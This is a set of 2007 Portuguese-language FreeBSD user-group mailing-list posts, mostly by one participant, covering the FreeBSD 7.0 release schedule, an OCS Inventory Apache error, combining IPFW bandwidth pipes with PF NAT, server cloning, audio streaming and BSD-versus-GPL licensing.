> Sobre a demora, acho que essa é uma impressão errada, que eu atribuo a
> artigos como "Whats Cooking for FreeBSD", e o congelamento da arvore
> estar sendo seguido de perto na FUG. Por exemplo, onde ja se viu o
> commit do bump version do script shell que batiza o 8.0-CURRENT virar
> noticia? Nao, isso nao eh ruin, mas cria uma expectativa diferente, como
> se estivesse "na boca do forno".
>
> Vou repetir um post que eu mencionei numa noticia da fug:
>
> -
>
> Pessoal,
>
> Não querendo desanimar os entusiasmados, mas o 7.0-RELEASE não está
> próximo. Vejam bem, não temos nenhum -BETA, nenhum -RC. Sem beta e sem
> Release Candidate, não tem -RELEASE. Na mais perfeita situação, um -RC é
> suficiente, mas é seguro considerar pelo menos um -BETA e um -RC. É
> parte do processo de engenharia 2 semanas entre -BETA e -RC. Isso quer
> dizer que vai faltar 4 semanas (1 mes) no mínimo, quando sair o primeiro
> ISO do 7.0-RELEASE. Se formos ser pé no chão deve existir pelo menos 1
> BETA e 2 -RC, isso da 6 semanas a partir da data X, onde X ainda não
> chegou.
>
> Outro indício que não falta pouco: não tem sequer agenda ainda pro
> FREEZE do RELENG_6. O 6.3-RELEASE e o 7.0-RELEASE devem ser lançados
> "juntos", com uma ou duas semanas de diferença, independente de quem
> saia primeiro. Todo -RELEASE "ponto-zero" é acompanhado de um -STABLE no
> ramo atual de produção. Foi assim com 5.5-RELEASE, foi assim com
> 4.11-RELEASE. Achar que não vai ser assim com 6.3-RELEASE é besteira.
>
> Pro 6.3 sair vai precisar de um freeze de pelo menos 1 mes. Pensem
> nisso, e não criem expectativas de "7.0 sai ja ja", pra nao achar que
> houve atraso, porque o que eu to notando é precipitação em achar que "ta
> saindo do forno". Não tá. A estabilidade do RELENG_7 é fruto do
> amadurecimento do processo de engenharia, não quer dizer que "está
> pronto, sai a qualquer momento".
>
> :)
>
> -
>
> Concluindo a linha de raciocionio, estamos no dia 16. Se sair um -BETA
> em imagem ISO hoje, tenho certeza que o 7.0 não sai antes de 16 de
> Novembro. Pra ser bem mais pé no chão, afinal, nao deve sair -BETA hoje
> hehe, da pra concluir que 7.0-RELEASE antes de Dezembro, é improvável.
>
> Enfim, considere: quando tiver 2 ou 3 semanas de Freeze do RELENG_6, ai
> sim o 7.0 pode sair a qualquer momento. Antes disso não se entusiasmem
> com pouca coisa :)
>
> So vamos ter nocao do que ta atrasando quando a agenda do 7.0 e do 6.3
> sair. Sem previsão de data como podemos achar que ta atrasado ou
> adiantado? Pessoalmente eu acho que ta adiantado, que o code-freeze do
> ports pro 7.0 foi adiantado ate demais hehe, que o freeze do HEAD foi
> adiantado, que a criacao do branch RELENG_7 foi na hora certa...

entendi irmão faz sentido sim

acho que tamos acostumados com os release de versão na mesma série,
igual 6.1, 6.2, 5.4, 5.5 que congela e logo logo ja sai

nas versoes .0 demora mais mesmo eu lembro do 6.0, 5.0

tinha um documento ai que falava de 2 a 3 versoes por ano mas nunca vi
se falava de quando que tem que sair as versao .0 nao eh? quando que
sai os .0? quando alguem decide?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] RES: ocs or para fazer inventario de maquinas win!?!

[Evandro Nunes]

po irmão que apache que é esse ai hein? pelo q eu lembro era pra
apache 2 que foi discutido os lance das dependencia ai e apache2 nao
precisa de apr nao

to achando que o seue  apache 1.3 irmao e no caso voce instalou o
mod_perl errado, do apache2

entao comeca de novo ai com apache2 e ai segue direitinho as
dependencia q o camarada listou uma a uma - mamao com acucar se seguir
direito pa

On 10/16/07, Diego Queiroz dos Santos <[EMAIL PROTECTED]> wrote:
> Eu to tendo um probleminha, ele da erro de sintaxe na 1113, mas la tem:
>
> PerlModule Apache::Ocsinventory .. e mais encima tem um comentario
> dizendo para nao modificar...
>
> E no apr..
> apr-1.2.7_1 The Apache Group's Portability Library
>
> Tudo foi instalado direitinho,conforme o howto do patrick .. e ainda
> atualzei os pacotes com portupgrade..o setup do ocs funfa direito
> certinho tbm, so da erro na hora de startar o apache..
>
> SERVER# /usr/local/etc/rc.d/apache restart
> apache not running? (check /var/run/httpd.pid).
> Starting apache.
> Syntax error on line 1113 of /usr/local/etc/apache/httpd.conf:
> Can't load '/usr/local/lib/perl5/site_perl/5.8.8/mach/auto/APR/APR.so'
> for module APR: Shared object "libaprutil-0.so.9" not found, required
> by "APR.so" at /usr/local/lib/perl5/5.8.8/mach/DynaLoader.pm line 230.
>  at /usr/local/lib/perl5/site_perl/5.8.8/mach/APR/Table.pm line 23
> Compilation failed in require at
> /usr/local/lib/perl5/site_perl/5.8.8/mach/APR/Table.pm line 23.
> BEGIN failed--compilation aborted at
> /usr/local/lib/perl5/site_perl/5.8.8/mach/APR/Table.pm line 23.
> Compilation failed in require at
> /usr/local/lib/perl5/site_perl/5.8.8/Apache/Ocsinventory/Server/Modperl2.pm
> line 39.
> BEGIN failed--compilation aborted at
> /usr/local/lib/perl5/site_perl/5.8.8/Apache/Ocsinventory/Server/Modperl2.pm
> line 39.
> Compilation failed in require at
> /usr/local/lib/perl5/site_perl/5.8.8/Apache/Ocsinventory.pm line 19.
> BEGIN failed--compilation aborted at
> /usr/local/lib/perl5/site_perl/5.8.8/Apache/Ocsinventory.pm line 28.
> Compilation failed in require at (eval 28) line 3.
>
> Obrigado!
>
> Em 02/10/07, Saulo Bozzi<[EMAIL PROTECTED]> escreveu:
>
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>
>
>
> --
> Att.
>
> Diego Queiroz dos Santos
> Iate Clube de Brasília
> (61) 92749832
>
> LEGAL ADVICE
> This message is exclusively destined for the people to whom it is
> directed, and it can bear private and/or legally exceptional
> information. If you are not addressee of this message, since now you
> are advised to not release, copy, distribute, check or, otherwise, use
> the information contained in this message, because it is illegal. If
> you received this message by mistake, we ask you to return this email,
> making possible, as soon as possible, the elimination of its contents
> of your database, registrations or controls system. The message that
> bears any mandatory links, issued by someone who has no representation
> powers, shall be null or void.
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Misturar IPFW e PF

[Evandro Nunes]

irmão pode usar sem problemas

so se lembre que o pf é processado primeiro e depois o ipfw entao por
exemplo se bloqueou no ipfw nao adianta ter liberado no pf

outra coisa que voce tem que lembra irmão é que pelo motivo do pf ser
processado primeiro quando voce chegar no ipfw o nat do pf ja vai ter
acontecido, então os IPs ja vao tar traduzido, beleza?

no mais pode usar os dois sem problema

eu uso motivado pela mesma coisa que voce, porque o altq é muito
bonzinho pra quem meche com poucas filas, pra ter dezenas, centenas de
filhas tem q configurar uma por uma na mão, com ipfw tem pipe e queue
dinamico que é uma maravilha do outro mundo (ha ha exagero? sai de um
background com Linux e TC onde voce tem 4 arquivos de configuracao por
HOST pra fazer o que no ipfw agora eu faco "dinamico" com mask e voce
vai ve que nao eh exagero nao)

alias irmao ve direito pra que voce precisa de pf

pf so vale a pena se voce tem que fazer balanceamento de saida com
multiplos links, que no ipfw ate faz mas nao tem stick address entao
fode o esquema, alem disso no ipfw e muito dificil e confuso, no pf
faz sozinho

se nao for isso, ou se nao for a necessidade nat-pool que o natd
tambem nao faz, se for um nat normal ou so saida por multiplos links
sem balancear dai o PF e so pra criar confusao ele e dispensavel
totalmente

ah e pf tambem nao filtra metade dos ipoptions e tcpoptions que o ipfw
filtra entao como firewall propriamente dito pf eh mediocre perto do
ipfw

mas tem umas feature mo bacana como nao matar state no reload das
regras, poder adicionar e remover um ip do pool, essas coisas. ah mas
pool volta no nat, e nisso, pf é impecavel, se voce precisa de coisa
avancada no nat

On 10/15/07, João Paulo Just <[EMAIL PROTECTED]> wrote:
> Olá, pessoal.
>
> Gostaria de misturar o IPFW com o PF da seguinte forma: IPFW fazendo
> controle de banda e PF fazendo NAT.
>
> Porque isso? Porque não fazer tudo no PF?
>
> O problema é que uso controle de banda dinâmico no IPFW da seguinte forma:
>
> -- ipfw.rules --
> # Download
> ipfw pipe 1 config bw 150Kbit/s mask dst-ip 0x
> # Upload
> ipfw pipe 2 config bw 150Kbit/s mask src-ip 0x
>
> ipfw add pipe 1 ip from not me to 172.16.16.0/20 in via rl0
> ipfw add pipe 2 ip from 172.16.16.0/20 to not me in via tun*
> 
>
> E não sei como fazer isso no PF, não consegui achar como fazer, e até já
> pedi auxílio à lista há um tempo atrás e ninguém pôde me ajudar (se
> alguém tiver a solução, me ajude).
>
> Então, pra continuar com o controle de banda do IPFW, qual seria a
> melhor forma de misturar os dois? Se eu tirar a NAT do IPFW e botar no
> PF direto vai funcionar tranquilo?
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] 7.0-RELEASE sai ou não sai?

[Evandro Nunes]

parece que o 7 está congelado há decadas já, até ja perdi a conta
 agora estão tirando os sensoreso do OpenBSD fora e tem uma noticia no
site da fug falando que o escalonador de que tanto se fala não vai
estar por padrão no 7

porque ta demorando tanto? ta quanto tempo atrasado?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Clonar FreeBSD sem parar o servidor

[Evandro Nunes]

On 9/28/07, Lutieri G. <[EMAIL PROTECTED]> wrote:
> Bom dia Lista!
>
>
> É conhecida alguma solução pra clonar um servidor em produção, sem
> pará-lo, via rede!?
> Não posso rodar ferramentas como dd, cloneit, g4u pois teria que
> reiniciar o servidor.
>
> E eu estava querendo fazer com o rsync da seguinte maneira.
> Colocar o rsync daemon no servidor em produção e depois ir na máquina
> nova e copiar tudo pra ela. Mas tenho um problema: A máquina nova tem
> que estar rodando algum sistema live. Tentei com alguns linux mas eles
> não montam ou montam as partições freebsd como somente leitura. Aí o
> rsync fica impossível de ser executado.

use o dump com restore, tem uma solução que eu uso perfeitamente aqui,
apresentada pelo patrick numa thread ha poucos dias:

http://www.fug.com.br/historico/html/freebsd/2007-09/msg00670.html

e quanto a disco live, e o que voce mais tem por ai, com freebsd,
comecando com freesbie


>
> Se alguém já fez uma gambiarra desse gênero por favor pronuncie-se! :-)
>
> Obrigado
>
> --
> Att.
> Lutieri G. B.
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] OCS e Notificação de Mudança

[Evandro Nunes]

On 9/24/07, Pablo Sánchez <[EMAIL PROTECTED]> wrote:
> Gera um arquivo da listagem completa de arquivos com permissão de
> execução a partir da raiz, aí, vc faz um diff entre o arquivo anterior
> e o novo, se forem iguais, não faz nada, se forem diferentes, então
> algo foi adicionado ou removido...
>
> Lembre que só o pkg_info não resolve, pois não vai pegar binários
> compilados na unha, pois nesse caso não há registro disponível
> indicando a ação.

Desculpe se não fui claro, mas me referia a notificação de modificação
nos ítens do inventário, não limitado ao FreeBSD mas sim todos
sistemas no OCS, em especial Windows. Essa sua sugestão estilo
Tripwire me é comum, mas preciso mesmo é via OCS. Obrigado pela
tentativa.

>
> Em 24/09/07, Evandro Nunes<[EMAIL PROTECTED]> escreveu:
> > Já que o assunto é o OCS, pergunto aos mais experientes: como ligo
> > notificação de mudança nas estações? Por exemplo, quero saber se
> > alguém instalou ou removeu um programa da estação, como que eu faço
> > isso?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Streaming de Audio Live / WMA

[Evandro Nunes]

On 9/27/07, Rafal Mentz Aquino <[EMAIL PROTECTED]> wrote:
> Um tempo atrás utilizei o VLC para teste de live streaming
> para audio e vídeo. Nos testes funcionou tudo.

Mas eu consigo acessar o serviço pelo media player sem instalar o
videolan client?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Streaming de Audio Live / WMA

[Evandro Nunes]

Alguem tem alguma sugestão como fazer streaming de audio ao vivo
(capturando de um microfone) no FreeBSD? Que possa ser aberto pelo
Windows Media Player (wma)? Eu consegui fazer streaming de playlist
mas não live.

Toda sugestão é bem vinda e será.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ocs or para fazer inventario de maquinas win!?!

[Evandro Nunes]

Daniel voce consegue fazer o OCS alertar quando ha mudanca de hardware
ou software? Poderia nos orientar?

On 9/26/07, Daniel Bristot de Oliveira <[EMAIL PROTECTED]> wrote:
> Eu tenho o OCS aqui rodando em FreeBSD, e fiz como o Patrick
> recomendou acima. O manual do OCS que tem no site detalha todas as
> dependencias dele. Passei os detalhes da instalacao para o Araujo@ e
> ele esta portando o OCS-ng para o FreeBSD.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] OCS e Notificação de Mudança

[Evandro Nunes]

Já que o assunto é o OCS, pergunto aos mais experientes: como ligo
notificação de mudança nas estações? Por exemplo, quero saber se
alguém instalou ou removeu um programa da estação, como que eu faço
isso?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Driver Linux viola a licenca BSD

[Evandro Nunes]

On 9/15/07, Carlos A. M. dos Santos <[EMAIL PROTECTED]> wrote:
>
> On 9/15/07, Evandro Nunes <[EMAIL PROTECTED]> wrote:
> > > A licença BSD permite distribuir o código executável sem distribuir o
> > > código-fonte correspondente, mesmo que este tenha sido modificado.
> [...]
> > Portanto, não posso relicencear. Apenas distribuir junto com outra
> licença,
> > como desejar, mas no caso da minha distribuição não ser binária, a
> licença
> > sempre deve ser no mínimo BSD também, certo?
>
> Exato. Podes incluir um trecho de código distribuído sob licença BSD num
> código maior, que distribuas sob licença XYZ. Terás, porém, que incluir no
> código duas informações de copyright e licença, uma correspondente ao
> trecho copiado e outra correspondente ao teu própro código.


Perfeito, e no caso de distribuicao binaria se for a BSD simplificada ou de
2 clausulas, nao requer mais adicao do Copyright a documentacao, ja que o
source nao e distribuido certo?

> > E como fica essa questao de licenca dupla, nao perde o sentido
> > > > licencear sob GPL e BSD se sao tao incompativeis?
> > >
> > > Eu já tratei desse assunto longamente em um artigo
> [...]
> > Então qual o sentido da GPL no caso desse driver atheros hal? Todas as
> > "liberdades forçosas" da GPL são "flexibilizadas/permitidas" pela BSD,
> então
> > a GPL acaba não tendo valor. No caso dos Linuxers que fizeram a
> modificacao,
> > querem que a modificacao originada de sua modificacao (nehuma hehe)
> > continuem aberta pra sempre. Mas se acompanhar a licenca BSD (e o autor
> que
> > que acompanhe), a BSD permite que qualquer um faca o que quiser,
> inclusve
> > distribuir binary-only. Elas ficam plenamente incomatíveis.
>
> Exemplificaste bem o principal problema: alguns adeptos da GPL tentam
> fazer dela uma mecanismo para "inocular" liberdade (ou pelo menos um
> conceito muito restrito de liberdade). Quando fazem isso com seu próprio
> código estão no seu direito mas mudar a licença de um código alheio sem
> permissão é, legalmente, roubo.
>
> O Theo de Raadt veio a Porto Alegre em maio, para o FISL. Tive a chance
> de, junto com alguns amigos, ter uma longa conversa de pizza e cerveja
> com ele. Isso foi meses antes do incidente discutido agora e ele já estava
> preocupado com esse tipo de coisa. O Stallman e a FSF têm divulgado a
> mensagem errada há anos, infelizmente com muito sucesso. Isso levou
> muita gente ter uma visão quase religiosa do assunto, o que dificulta
> muitíssimo a discussão.


Conversei com o Theo também, não gostei de algumas posicoes dele em relacao
ao FreeBSD, como por exemplo sua posicao contraria a alguns codigos que nao
sejam de licenca BSD, como ZFS, e dual-licencear trabalho financiado em
BSD+XYZ se XYZ nao forem opensource. Eu pessoalmente discordo e acho que ha
um risco de parecer tao radical quanto Stallman. E radicalismo, ao meu ver,
e' um pe' fora da razao. Ainda que outro esteja dentro.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Driver Linux viola a licenca BSD

[Evandro Nunes]

On 9/15/07, Patrick Tracanelli <[EMAIL PROTECTED]> wrote:
>
>
> > Referências
> >
> > 1.
> http://unixmania.blogspot.com/2007/04/licenas-bsd-e-gpl-uma-breve-comparao.html
> > 2. http://unixmania.blogspot.com/2007/04/no-existe-software-livre.html
> > 3. http://www.mysql.com/products/enterprise/server.html
>
> Carlos, esses seus dois artigos sao mesmo otimas referencias, a ser
> citadas. O evandro tinha levantado uns pontos curiosos sobre a
> GPLv3/GPLv2/BSD, em referencia a noticia:
>
> http://www.fug.com.br/content/view/361/2/
>
> Seria muito bom se voce pudesse atualizar, ou complementar esses artigos
>   com uma analise sua sobre o que muda com a GPLv3, quais as vantagens
> da licenca BSD sob ela, especialmente em relacao aos usuarios que usam
> as brechas da GPLv2 para usar produto licenceado sob ela. Enfim, uma
> analise do que esta por vir, e se essa realmente eh uma oportunidade "de
> ouro" para divulgar licenca e software BSD a "vendors".


Reitero o pedido, seria proveitoso.

o que fabricantes de appliances, como os GrupoNet, BRC, dentro outros,
perdem por exemplo com a gpl3 que seria mais adequado partir para software
bsd?
essas sao perguntas que se respondermos comecamos cumprir um pouco do pedido
da fundacao freebsd
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Heartbeat Parando

[Evandro Nunes]

Não sei o motivo, ja que não sou usuário de HeartBeat, o que teoricamente me
desqualifica para responder nessa thread, mas mesmo assim meu pitaco:
considerando que esse é uma tecnologia tipicamente Linux, pode estar
morrendo por problemas na portagem para BSD, ou por ser mal feito mesmo.
Seja como for, você tem opções melhores no mundo BSD. Se viável no seu
ambiente, planeje migrar para FreeVRRP ou CARP. Nenhum deles para ;)
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Driver Linux viola a licenca BSD

[Evandro Nunes]

On 9/15/07, Douglas Santos <[EMAIL PROTECTED]> wrote:
>
> On 9/15/07, Carlos A. M. dos Santos <[EMAIL PROTECTED]> wrote:
> > On 9/15/07, NgD Vulto <[EMAIL PROTECTED]> wrote:
> > > Em 13/09/07, Douglas Santos<[EMAIL PROTECTED]> escreveu:
> > > > É importante observar que:
> > > > 1 - Apenas o autor pode modificar o copyright
> > >
> > > Eu não posso ter certeza disso, você poderia me dizer onde diz isso?
> >
> > A Convenção de Berna e todos os acordos internacionais que vieram
> > depois dela dizem isso.
>
> Muito bem colocado Prof. Carlos.
>
> Eu tenho certeza de que muitas pessoas que trabalham com Linux/GPL
> hoje não sabem o que é Copyright, muito menos pra que serve
> a licença de software.


Ao que se nota, aqui na lista mesmo muita gente não sabe o que é Copyright
nem o que é licença, vide o caso dos eBooks. Mas certamente é ainda pior
ignorar mesmo apos ser notificado. E bater o pé ainda. Vide o caso aqui da
lista e muito pior, dos desenvolvedores Linux. Um kernel desenvolvido por
pessoas que desrespeitam outras pessoas. Bem desconfortavel ter consciencia
disso.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Driver Linux viola a licenca BSD

[Evandro Nunes]

On 9/15/07, Carlos A. M. dos Santos <[EMAIL PROTECTED]> wrote:
>
> On 9/15/07, Evandro Nunes <[EMAIL PROTECTED]> wrote:
> > Eu gostaria de saber a opiniao do Professor Casantos sobre isso.
> > Desde o Encontro de FreeBSD em Sao Carlos, gosto das
> > consideracoes e textos sobre licencas do mesmo.
>
> Atendendo a pedidos... com a ressalva de que não sou mais professor. :-)


Ser professor é muito mais que exercer a profissão ;)

> Mas sempre tive entendimento que Licenca BSD poderia ser livremente
> > relicenceada. Sempre estive errado?
>
> A licença BSD permite distribuir o código executável sem distribuir o
> código-fonte correspondente, mesmo que este tenha sido modificado.
> A Microsoft, por exemplo, incluiu no Windows XP código baseado na
> implementação de TCP/IP do BSD (basta olhar o arquivo README.HTM
> que está no CD de instalação do XP para ver isso). Isso, entretanto,
> não significa a Microsoft distribua o código com uma licença nova. Pelo
> contrário, ela distribui código executável exatamente como a licença
> exige que se faça: inclui na documentação a informação de que o
> copyright do software é de outros as condições sob as quais esse
> software é provido.


Portanto, não posso relicencear. Apenas distribuir junto com outra licença,
como desejar, mas no caso da minha distribuição não ser binária, a licença
sempre deve ser no mínimo BSD também, certo?

> E como fica essa questao de licenca dupla, nao perde o sentido
> > licencear sob GPL e BSD se sao tao incompativeis?
>
> Eu já tratei desse assunto longamente em um artigo [1], por isto
> me limitarei a lembrar que só o proprietário do software pode
> decidir que licença será usada. Por isto que eu costumo dizer
> que não existe, de fato, software livre [2]. O proprietário pode usar
> duas licenças, mas é raro isso acontecer simultaneamente. O
> MySQL, por exemplo, é provido sob licença GPL, mas a MySQL AB
> tem uma versão "Enterprise Server" [3] disponível apenas mediante
> pagamento. Ela - e só ela - pode fazer isso porque é a detentora
> do copyright.


Então qual o sentido da GPL no caso desse driver atheros hal? Todas as
"liberdades forçosas" da GPL são "flexibilizadas/permitidas" pela BSD, então
a GPL acaba não tendo valor. No caso dos Linuxers que fizeram a modificacao,
querem que a modificacao originada de sua modificacao (nehuma hehe)
continuem aberta pra sempre. Mas se acompanhar a licenca BSD (e o autor que
que acompanhe), a BSD permite que qualquer um faca o que quiser, inclusve
distribuir binary-only. Elas ficam plenamente incomatíveis.


Referências
>
> 1.
> http://unixmania.blogspot.com/2007/04/licenas-bsd-e-gpl-uma-breve-comparao.html
> 2. http://unixmania.blogspot.com/2007/04/no-existe-software-livre.html
> 3. http://www.mysql.com/products/enterprise/server.html
> --
> Carlos A. M. dos Santos
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Servidor de Vídeo-conferencia Resolv ido

[Evandro Nunes]

On 9/15/07, Alvaro Resurreição <[EMAIL PROTECTED]> wrote:
>
> Opa, vou fazer o teste, concordo com sua visão de usar aplicativos padrões
>
> Mas essa solução é apenas para vídeo? como você trata chats por texto? ele
> se encarrega disso também?


Sim, só para vídeo, mas permite double-flow, ou seja quem assiste pode
também transmitir, se tiver Quicktime e uma Webcam, e você pode selecionar,
por comandos e (teoricamente, nao testei também via Web), uma webcam como
foco do streaming, ao inves do video principal ou camera principal.

O chat eu faco bem simples, um  onde eu coloco o src de video,
dentro de um HTML convencional, tem outro  em baixo onde esta o
chat, um script simples em php. Assim, em uma tela convencional de 800x600 e
possivel ter o chat ocupando 200 pixels de altura (da um bom visual
historico, das ultimas mensagens) e ter o video na mesma tela. Outra opcao
seria colocar lateralmente, mas nao precisei disso. Simples, facil, e
principalmente funcional. Atende perfeitamente os usuarios (ensino a
distancia) do sistema.

Grato
>
> Evandro Nunes <[EMAIL PROTECTED]> escreveu: Meus 2 cents.
>
> Sempre uso Darwin Streaming Server no FreeBSD, e como cliente o proprio
> Quicktime. Quase uma solucao 100% Apple, porem em FreeBSD. Acredito ser a
> melhor opcao ja que Quicktime e Windows Media Player sao os
> padroes-de-fato,
> nao tendo que pedir aos usuarios instalar essas coisas exoticas como
> cliente, nem vlc, etc.
>
> Sugiro experimentar
> tem no Ports
> e a configuracao depois da instalacao eh tudo via interface WEB
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>
>Flickr agora em português. Você clica, todo mundo vê. Saiba mais.
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Driver Linux viola a licenca BSD

[Evandro Nunes]

Eu gostaria de saber a opiniao do Professor Casantos sobre isso. Desde o
Encontro de FreeBSD em Sao Carlos, gosto das consideracoes e textos sobre
licencas do mesmo. Mas sempre tive entendimento que Licenca BSD poderia ser
livremente relicenceada. Sempre estive errado? E como fica essa questao de
licenca dupla, nao perde o sentido licencear sob GPL e BSD se sao tao
incompativeis?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Servidor de Vídeo-conferencia Resolv ido

[Evandro Nunes]

Meus 2 cents.

Sempre uso Darwin Streaming Server no FreeBSD, e como cliente o proprio
Quicktime. Quase uma solucao 100% Apple, porem em FreeBSD. Acredito ser a
melhor opcao ja que Quicktime e Windows Media Player sao os padroes-de-fato,
nao tendo que pedir aos usuarios instalar essas coisas exoticas como
cliente, nem vlc, etc.

Sugiro experimentar
tem no Ports
e a configuracao depois da instalacao eh tudo via interface WEB
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd